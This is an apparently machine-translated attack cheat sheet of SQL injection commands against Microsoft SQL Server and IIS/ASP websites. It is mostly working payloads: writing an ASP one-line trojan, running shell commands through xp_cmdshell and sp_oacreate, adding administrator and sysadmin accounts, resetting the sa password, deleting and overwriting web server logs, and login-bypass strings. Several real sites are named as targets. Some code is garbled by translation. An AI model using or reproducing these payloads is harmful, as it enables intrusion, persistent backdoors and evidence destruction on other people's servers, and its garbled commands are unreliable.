The most detailed SQL Injection-related commands) page 1/2

1. Use ^ escape characters to write ASP (one-sentence Trojan Horse) files:
? Http: // 192.168.1.5/display. asp? Keyno = 1881; exec master. dbo. xp_mongoshell 'echo ^ <script language = VBScript runat = server ^> execute request ^ ("l" ^) ^ </script ^> c: \ mu. asp ';--

? Echo ^ <% execute ^ (request ^ ("l" ^) % ^> c: \ mu. asp

2. display the SQL System Version:
? Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (select @ VERSION)
? Http://www.xxxx.com/FullStory.asp? Id = 1 and 1 = convert (int, @ version )--

Microsoft VBScript compiler error: '800a03f6'
'End' missing'
/IisHelp/common/500-100.asp, row 242
Microsoft ole db Provider for ODBC Drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000-8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) 'to a column of data type int.
/Display. asp, Row 17
3. When detecting Sony's Chinese website vulnerabilities, it is clearly determined that the vulnerability exists, but the corresponding types cannot be found in these three vulnerabilities. By accident, I thought that the keyword "in" can be used in SQL, for example, "select * from mytable where id in (1 )", the value in the brackets is the data we submit. The result is exactly the same as the query result using "select * from mytable where id = 1. So when you access the page, add ") and 1 = 1 and 1 in (1" after the URL, the original SQL statement becomes "select * from mytable where id in (1) and 1 = 1 and 1 in (1) ", so that the long-awaited page will appear. For the moment, this type of vulnerability is called "include number type". If you are smart, you must think of "include number type. By the way, it is caused by a query statement similar to "select * from mytable where name in ('firstsee.

4. Determine whether the xp_mongoshell extended storage process exists:
Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (select count (*) FROM master. dbo. sysobjects where xtype = 'X' AND name = 'xp _ Your shell ')
Command for restoring xp_mongoshell extended storage:
Http://www.test.com/news/show1.asp? Newsid= 125272
; Exec master. dbo. sp_addextendedproc 'xp _ external shell', 'e: \ inetput \ web \ xplog70.dll ';--

5. Write command lines and execution programs to the Startup Group:
Http: // 192.168.1.5/display. asp? Keyno = 188; EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ run', 'help1', 'reg_sz', 'cmd.exe/c net user test ptlove/add'

6. view the current database name:
? Http: // 192.168.1.5/display. asp? Keyno = 188 and 0 <> change db_name (n) n to 0, 1, 2, 3 ...... Cross-Database
? Http://www.xxxx.com/FullStory.asp? Id = 1 and 1 = convert (int, db_name ())--
Microsoft VBScript compiler error: '800a03f6'
'End' missing'
/IisHelp/common/500-100.asp, row 242
Microsoft ole db Provider for ODBC Drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/Display. asp, Row 17
7. list all current database names:
Select * from master. dbo. sysdatabases to list records of all columns
Select name from master. dbo. sysdatabases only lists records in the name column

8. xp_cmdshell is not required to support running the CMD command on SQL servers with injection vulnerabilities:
Create TABLE mytmp (info VARCHAR (400), ID int IDENTITY () not null)
DECLARE @ shell INT
DECLARE @ fso INT
DECLARE @ file INT
DECLARE @ isEnd BIT
DECLARE @ out VARCHAR (400)
EXEC sp_oacreate 'wscript. shell', @ shell output
EXEC sp_oamethod @shell,'run', null,'cmd.exe/c dir c: \> c: \ temp.txt ', '0', 'true'
-- Note that the run parameter true indicates the result of waiting for the program to run. This parameter must be used for long-time commands similar to ping.

EXEC sp_oacreate 'scripting. filesystemobject ', @ fso output
EXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: \ temp.txt'
-- Because the fso opentextfile method returns a textstream object, @ file is an object token.

WHILE @ shell> 0
BEGIN
EXEC sp_oamethod @ file, 'readline', @ out
Insert into mytmp (info) VALUES (@ out)
EXEC sp_oagetproperty @ file, 'endofstream', @ isEnd out
IF @ isEnd = 1 BREAK
ELSE CONTINUE
END

Drop TABLE MYTMP

----------
DECLARE @ shell INT
DECLARE @ fso INT
DECLARE @ file INT
DECLARE @ isEnd BIT
DECLARE @ out VARCHAR (400)
EXEC sp_oacreate 'wscript. shell', @ shell output
EXEC sp_oamethod @shell,'run', null,'cmd.exe/c cscript C: \ Inetpub \ AdminScripts \ adsutil. vbs set/W3SVC/InProcessIsapiApps "C: \ WINNT \ system32 \ idq. dll "" C: \ WINNT \ system32 \ inetsrv \ httpext. dll "" C: \ WINNT \ system32 \ inetsrv \ httpodbc. dll "" C: \ WINNT \ system32 \ inetsrv \ ssinc. dll "" C: \ WINNT \ system32 \ msw3prt. dll "" C: \ winnt \ system32 \ inetsrv \ asp. dll "> c: \ temp.txt ', '0', 'true'
EXEC sp_oacreate 'scripting. filesystemobject ', @ fso output
EXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: \ temp.txt'
WHILE @ shell> 0
BEGIN
EXEC sp_oamethod @ file, 'readline', @ out
Insert into mytmp (info) VALUES (@ out)
EXEC sp_oagetproperty @ file, 'endofstream', @ isEnd out
IF @ isEnd = 1 BREAK
ELSE CONTINUE
END

Add WEB users to the Administrator group in one row:
DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate 'wscript. shell ', @ shell output EXEC sp_oamethod @shell,'run', null,'cmd.exe/c cscript C: \ Inetpub \ AdminScripts \ adsutil. vbs set/W3SVC/InProcessIsapiApps "C: \ WINNT \ system32 \ idq. dll "" C: \ WINNT \ system32 \ inetsrv \ httpext. dll "" C: \ WINNT \ system32 \ inetsrv \ httpodbc. dll "" C: \ WINNT \ system32 \ inetsrv \ ssinc. dll "" C: \ WINNT \ system32 \ msw3prt. dll "" C: \ winnt \ system32 \ inetsrv \ asp. dll "> c: \ temp.txt ', '0', 'true' EXEC sp_oacreate 'scripting. filesystemobject ', @ fso output EXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: \ temp.txt' WHILE @ shell> 0 begin exec sp_oamethod @ file, 'readline ', @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, 'atendofstream', @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END

Execute the EXE program in one line:
DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate 'wscript. shell ', @ shell output EXEC sp_oamethod @shell,'run', null,'cmd.exe/c cscript.exe E: \ bjeea.net.cn \ score \ fts \ images \ iis. vbs lh1 c :\> c: \ temp.txt ', '0', 'true' EXEC sp_oacreate 'scripting. filesystemobject ', @ fso output EXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: \ temp.txt' WHILE @ shell> 0 begin exec sp_oamethod @ file, 'readline ', @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, 'atendofstream', @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END

Three methods for executing CMD commands in SQL:

Delete log 7.18 first:
(1) exec master. dbo. xp_cmdshell 'del C: \ winnt \ system32 \ logfiles \ W3SVC5 \ ex050718.log> c: \ temp.txt'

(2) DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate 'wscript. shell ', @ shell output EXEC sp_oamethod @shell,'run', null,'cmd.exe/c del C: \ winnt \ system32 \ logfiles \ W3SVC5 \ ex050718.log> c: \ temp.txt', '0 ', 'true' EXEC sp_oacreate' scripting. filesystemobject ', @ fso output EXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: \ temp.txt' WHILE @ shell> 0 begin exec sp_oamethod @ file, 'readline ', @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, 'atendofstream', @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END

(3) First, enable the jet sandbox mode. You can modify the Registry by extending the Stored Procedure xp_regwrite. The administrator cannot prevent the modification. For security reasons, the default sandbox mode is not enabled, Which is why xp_regwrite is required. xp_regwrite requires at least the DB_OWNER permission. For convenience, we recommend that you use sysadmin for permission testing:
? Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1
Note:
0. disable everything (default)
1 enable ACCESS, but Disable other
2. ACCESS is forbidden, but other
3. Enable everything

? Here, only the commands used with the sysadmin permission are provided:
Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ ias. mdb ', 'select shell ("cmd.exe/c net user admin admin1234/add ")')

? To create a linked database 'l0op8ack', refer to the command:
EXEC sp_addmediaserver 'l0op8ack', 'ole DB Provider for Jet ', 'Microsoft. Jet. OLEDB.4.0', 'c: \ windows \ system32 \ ias. mdb'

? How to Use the Linked database:

This method can be executed, but unfortunately, the DB_OWNER permission is insufficient. At least the sysadmin permission or securityadmin + setupadmin permission combination is required.
Sp_addmediaserver requires sysadmin or setupadmin Permissions
Sp_addjavassrvlogin requires sysadmin or securityadmin permissions.
In the end, we found that the sa permission or setupadmin + securityadmin permission account can be used only,
Generally, no administrator has set the general account permission.

Not practical, just as a learning conclusion

The general process is as follows. If it is not sysadmin, the IAS. mdb permission verification will fail,
I granted the setupadmin + securityadmin permission to the hacker user during the test, and failed to use ias. mdb.
You need to find an mdb that can be accessed by a general user:

? Create a connection server "L0op8ack": EXEC sp_addmediaserver 'l0op8ack', 'jetoledb', 'Microsoft. jet. OLEDB.4.0 ', 'c: \ winnt \ system32 \ ias. mdb ';--
? Exec sp_add1_srvlogin 'l0op8ack', 'false'; -- or
Exec sp_add1_srvlogin 'l0op8ack', 'false', NULL, 'test1', 'ptlove ';--
? Select * from openquery (L0op8ack, 'select shell ("cmd.exe/c net user ")');--
? Exec sp_droplinkedsrvlogin 'l0op8ack', 'false ';--
? Exec sp_dropserver 'l0op8ack ';--

Another example is to replace the 7.18 file:
(1) exec master. dbo. xp_cmdshell 'Copy C: \ winnt \ system32 \ logfiles \ W3SVC5 \ ex050716.log C: \ winnt \ system32 \ logfiles \ W3SVC5 \ ex050718.log> c: \ temp.txt'

(2) DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate 'wscript. shell ', @ shell output EXEC sp_oamethod logs/c copy C: \ winnt \ system32 \ logfiles \ W3SVC5 \ ex050716.log C: \ winnt \ system32 \ logfiles \ W3SVC5 \ ex050718.log> c: \ temp.txt ', '0', 'true' EXEC sp_oacreate 'scripting. filesystemobject ', @ fso output EXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: \ temp.txt' WHILE @ shell> 0 begin exec sp_oamethod @ file, 'readline ', @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, 'atendofstream', @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END

(3) DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate 'wscript. shell ', @ shell output EXEC sp_oamethod @shell,'run', null,'cmd.exe/c net user> c: \ temp.txt', '0', 'true' EXEC sp_oacreate 'scripting. filesystemobject ', @ fso output EXEC sp_oamethod @ fso, 'opentextfile', @ file out, 'c: \ temp.txt' WHILE @ shell> 0 begin exec sp_oamethod @ file, 'readline ', @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, 'atendofstream', @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END

9. update the table data:
HTTP: // xxx. xxx. xxx/abc. asp? P = YY; update upload. dbo. admin set pwd = 'a0b923820dcc509a 'where username = 'www ';--
The 16-bit MD5 value of the www user password is a0b923820dcc509a, that is, the password is changed to 1;
The 32-bit MD5 value is:, and the password is

10. Use the table content to import files
SQL has the BCP command, which can export the table content into a text file and place it in a specified location. With this function, we can first create a temporary table, then input an ASP trojan in one row in the table, and then use the BCP command to export and form an ASP file.
The command line format is as follows:
Bcp "select * from temp" queryout c: \ inetpub \ wwwroot \ runcommand. asp-c-S localhost-U sa-P upload (the 's' parameter is the server for query execution, the 'U' parameter is the user name, And the 'p' parameter is the password, finally, a runcommand is uploaded. asp Trojan ).

11. Methods for creating tables, broadcasting data, and reading data
? Create a table:
'And 1 = 1 union select 1, 2, 4; create table [dbo]. [cyfd] ([gyfd] [char] (255 ))--
? Input data to the table:
'And 1 = 1 union select 1, 2, 4; DECLARE @ result varchar (255) select top 1 name from upload. dbo. sysobjects where xtype = 'U' and status> 0, @ result output insert into cyfd (gyfd) values (@ result );--
'And 1 = 1 union select 1, 2, 4; DECLARE @ result varchar (255) exec master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ CONTROLSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into cyfd (gyfd) values (@ result );--
? Read data from the table:
'And 1 = (select count (*) from cyfd where gyfd> 1 )--

? Delete temporary table:
'; Drop table cyfd ;--

12. Use SQL statements to directly change the sa password:
? Update master. dbo. sysxlogins set password = writable where sid = 0x01, so that the sa password is changed to 111111. The solution is to delete sa ., For more information about how to delete a sa webshell, see my Delete sa webshell.

? View All database usernames on the local machine:
Select * from master. dbo. sysxlogins
Select name, sid, password, dbid from master. dbo. sysxlogins

? To change the sa password, run the following command:
Exec sp_password NULL, 'new password', 'sa'

13. query all the table names and table structures in the dvbbs database:
? Select * from dvbbs. dbo. sysobjects where xtype = 'U' and status> 0
? Select * from dvbbs. dbo. syscolumns where id = 1426104121

14. Manually back up the current database:
Full backup:
; Declare @ a sysname, @ s nvarchar (4000)
Select @ a = db_name (), @ s = 'C:/db1' backup database @ a to disk = @ s WITH formAT --
Differential backup:
; Declare @ a sysname, @ s nvarchar (4000)
Select @ a = db_name (), @ s = 'C:/db1' backup database @ a to disk = @ s with differential, formAT-

15. add and delete a SA permission user test:
Exec master. dbo. sp_addlogin test, ptlove
Exec master. dbo. sp_addsrvrolemember test, sysadmin

Cmd.exe/c isql-E/U alma/P/I K: \ test. qry

16. select * from ChouYFD. dbo. sysobjects where xtype = 'U' and status> 0
The table names created by all users in ChouYFD can be listed.
Select name, id from ChouYFD. dbo. sysobjects where xtype = 'U' and status> 0

17,
? Http://www.npc.gov.cn/zgrdw/common/image_view.jsp? Sqlstr = select * from rdweb. dbo. syscolumns (where id = 1234)
List field names in all tables in the rdweb Library
? Select * from dvbbs. dbo. syscolumns where id = 5575058
All field names whose table id is 5575058

18. delete record command: delete from Dv_topic where boardid = 5 and topicid = 7978

19. How to enter the background by bypassing logon Verification:
1) 'or ''='
2) 'or 1 = 1 --
3) 'or 'A' = 'a --
4) 'or' = 'or'
5) "or 1 = 1 --
6) or 1 = 1 --
7) or 'a = 'a
8) "or" a "="
9) ') or ('A' = 'a
10) ") or (" a "="
11) or (1 = 1
12) 'or ''='
13) popularity % 'and 1 = 1 and' % '='

20. How to find the website path:
1) view the WEB site installation directory command:
? Cscript c: \ inetpub \ adminscripts \ adsutil. vbs enum w3svc/2/root> c: \ test1.txt (replace 2 with 1, 3, 4, and 5)
Type c: \ test1.txt
Del c: \ test1.txt
The running results can be directly displayed in NBSI, so you do not need to export them to files.

2) randomly find an image named 123.jpg on the website.
Then write it into the batch processing program 123.bat:
D:
Dir 123.jpg/s> c: \ 123.txt
E:
Dir 123.jpg/s> c: \ 123.txt
F:
Dir 123.jpg/s> c: \ 123.txt

Type c: \ 123.txt after execution
In this way, the website path is analyzed.

3) the SQL Server and website server are on the same server. Can you execute the command?
Output the command
% Windir % \ help \ iishelp \ common \ 404b.htm or 500.asp
Note that the two files are backed up before output.
For example:
Dir c: \> % windir % \ help \ iishelp \ common \ 404b.htm
Then enter a file to access: http: // target ip Address/2.asp

4) for win2000 systems: xp_regread, read HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots to obtain the WEB path
2003 system: xp_regread read, method not found
For example:
(1) create a new table cyfd (field is gyfd): http://www.cnwill.com/NewsShow.aspx? Id = 4844; create table [dbo]. [cyfd] ([gyfd] [char] (255 ))--
(2) write the web path into: http://www.cnwill.com/NewsShow.aspx? Id = 4844; DECLARE @ result varchar (255) exec master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ CONTROLSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into cyfd (gyfd) values (@ result );--
(3) or let him not match, Show ERROR: http://www.cnwill.com/NewsShow.aspx? Id = 4844 and 1 = (select count (*) from cyfd where gyfd> 1)
Source:. Net SqlClient Data Provider
Description: A syntax error occurs when the varchar value 'y: \ Web \ Yantai talent hotline background management system, 201 'is converted to a column whose data type is int.
TargeSite: Boolean Read () Hahaha .. The path is exposed ..
(4) Delete the table: http://www.cnwill.com/NewsShow.aspx? Id = 4844; drop table cyfd ;--

5) use the regedit command to export the registry and save the exported result to the % windir % \ help \ iishelp \ common \ 404b.htm or 500. asp page.
Regedit command description:
Regedit/L: system/R: user/E filename. reg Regpath
Parameter description:
/L: system specifies the path of the System. dat file.
/R: user specifies the path of the User. dat file.
/E: this parameter specifies that the Registry Editor needs to export the Registry. If this parameter is left blank, enter the file name of the exported registry.
Regpath: used to specify the Registry branch to export. If not specified, all registry branches will be exported. Among these parameters, the "/L: system" and "/R: user" parameters are optional. If you do not use these two parameters, registry Editor considers it to be "system. dat "and" user. dat file. If you start from a floppy disk and enter DOS, you must use the "/L" and "/R" parameters to specify "system. dat "and" user. the path of the dat file. Otherwise, the Registry Editor cannot find them. For example, if you enter DOS through the boot disk, the backup registry command is "Regedit/L: C: \ windows \/R: C: \ windows \/e regedit. reg ", which means to back up the entire registry to the WINDOWS directory. The file name is" regedit. reg ". If the input is "regedit/e d: \ regedit. reg "indicates that the entire registry is backed up to the root directory of the d disk (the"/L "and"/R "parameters are omitted). The file name is" Regedit. reg ".

Regedit/s c: \ adam. reg (import the c: \ adam. reg file to the Registry)
Regedit/e c: \ web. reg (back up all registered content to c: \ web. reg)
For win2000 systems: C :\> regedit/e % windir % \ help \ iishelp \ common \ 404b.htm "HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots"
Then http: // target IP Address/2.asp
For the win2003 system: not found, hope to find a friend to publish it for discussion.

6) The files under % SystemRoot % \ system32 \ inetsrv \ MetaBack \ On the VM are iis backup files, which are accessible to web users. If your iis is backed up here, download the package with webshell and open it with notepad. You can obtain the corresponding domain name and absolute web path.

7) create a virtual directory using SQL injection. If you have the dbo permission, you cannot find the absolute web path:
In many cases, we often encounter SQL injection that can be used to list directories and run commands, but it is not easy to find the directory where the web is located, so it is difficult to get a webshell. This is a good trick:
? Create a virtual directory win, pointing to c: \ winnt \ system32: exec master. dbo. xp_mongoshell 'cscript C: \ inetpub \ AdminScripts \ mkwebdir. vbs-c localhost-w "l"-v "win", "c: \ winnt \ system32 "'
? Let the win Directory have the permission to parse asp scripts: exec master. dbo. xp_cmdshell 'cscript C: \ inetpub \ AdminScripts \ adsutil. vbs set w3svc/1/root/win/Accessexecute "true"-s :'
? Delete the virtual directory win: exec master. dbo. xp_cmdshell 'cscript C: \ inetpub \ AdminScripts \ adsutil. vbs delete w3svc/1/root/win /'
? Test: http: // 127.0.0.1/win/test. asp